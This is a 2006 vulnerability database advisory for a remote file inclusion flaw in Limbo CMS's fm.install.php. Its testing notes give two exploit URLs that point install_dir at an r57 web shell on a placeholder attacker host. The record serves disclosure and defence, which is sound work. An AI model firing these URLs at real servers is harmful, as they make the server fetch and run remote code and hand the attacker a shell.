Limbo fm.install.php lm_absolute_path Variable Remote File Inclusion

2006-09-13T14:48:55
ID OSVDB:28977
Type osvdb
Reporter HACKERS PAL(security@soqor.net)
Modified 2006-09-13T14:48:55

Description

Manual Testing Notes

/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://[attacker]/tools/r57.txt? /components/com_fm/fm.install.php?lm_absolute_path=../../&install_dir=http://[attacker]/tools/r57.txt?

References:

Vendor URL: http://www.limboforge.org/ Secunia Advisory ID:21944 Related OSVDB ID: 28982 Related OSVDB ID: 28983 Related OSVDB ID: 28984 Related OSVDB ID: 28987 Related OSVDB ID: 28976 Related OSVDB ID: 28978 Related OSVDB ID: 28979 Related OSVDB ID: 28981 Related OSVDB ID: 28980 Related OSVDB ID: 28986 Related OSVDB ID: 28985 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0264.html Mail List Post: http://attrition.org/pipermail/vim/2006-September/001043.html